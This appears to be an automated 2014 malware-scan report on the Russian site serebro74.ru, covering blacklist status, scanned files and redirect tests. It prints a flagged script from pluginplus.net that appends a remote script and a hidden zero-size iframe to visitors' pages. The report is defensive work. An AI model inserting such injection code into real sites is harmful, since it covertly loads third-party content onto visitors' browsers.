Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=serebro74.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://serebro74.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://serebro74.ru/ | 200 OK Content-Length: 22708 Content-Type: text/html | clean |
http://serebro74.ru/js/lib/jquery.js | 200 OK Content-Length: 93436 Content-Type: application/javascript | clean |
http://serebro74.ru/js/c.js | 200 OK Content-Length: 2643 Content-Type: application/javascript | clean |
http://serebro74.ru/js/fbox.jquery.js | 200 OK Content-Length: 25687 Content-Type: application/javascript | clean |
http://serebro74.ru/js/lib/swfobject/swfobject.js | 200 OK Content-Length: 10220 Content-Type: application/javascript | clean |
http://serebro74.ru/raspisanie/ | 200 OK Content-Length: 20827 Content-Type: text/html | clean |
https://pluginplus.net/plugins/system/system_im.js | 200 OK Content-Length: 565 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var script3 = document.createElement('script');
script3.type = 'text/javascript'; document.getElementsByTagName('body')[0].appendChild(script3); script3.src = 'https://pluginplus.net/plugins/system_rek.js'; function statistic_im(){ var script3 = document.createElement('iframe'); document.getElementsByTagName('body')[0].appendChild(script3); script3.style['width'] = '0px'; script3.style['height'] = '0px'; script3.style['border'] = '0px'; script3.src = 'http://pluginplus.net/plugins/statistic/statistic_im.html'; } statistic_im() Antivirus reports:
| ||
http://c.am15.net/preloader7.js | 200 OK Content-Length: 11226 Content-Type: application/x-javascript | clean |
http://serebro74.ru/club/tvorcheskaja-masterskaja/ | 200 OK Content-Length: 16615 Content-Type: text/html | clean |
http://serebro74.ru/news/ | 200 OK Content-Length: 13412 Content-Type: text/html | clean |
http://serebro74.ru/schaste-byt-zhenshhinoj/ | 200 OK Content-Length: 13230 Content-Type: text/html | clean |
http://serebro74.ru/club/parables/ | 200 OK Content-Length: 26810 Content-Type: text/html | clean |
http://serebro74.ru/club/parables/ÐÑбовÑ-и-СÑмаÑÑеÑÑвие/ | 200 OK Content-Length: 18289 Content-Type: text/html | clean |
http://serebro74.ru/club/parables/РебÑнок-ÑпÑоÑил-Ñ-Ðога/ | 200 OK Content-Length: 13198 Content-Type: text/html | clean |
http://serebro74.ru/club/parables/бабÑÑка-и-внÑÑка_175/ | 200 OK Content-Length: 13521 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: serebro74.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Aug 2014 15:01:19 GMT
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: +1h
Set-Cookie: ClientID=140889247981108788873917; path=/; domain=.serebro74.ru; expires=Mon, 24-Aug-2015 15:01:19 GMT
X-Powered-By: Flexites
GET / HTTP/1.1
Host: serebro74.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Aug 2014 15:01:19 GMT
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: +1h
Set-Cookie: ClientID=140889247981108788873917; path=/; domain=.serebro74.ru; expires=Mon, 24-Aug-2015 15:01:19 GMT
X-Powered-By: Flexites
Second query (visit from search engine):
GET / HTTP/1.1
Host: serebro74.ru
Referer: http://www.google.com/search?q=serebro74.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: serebro74.ru
Referer: http://www.google.com/search?q=serebro74.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.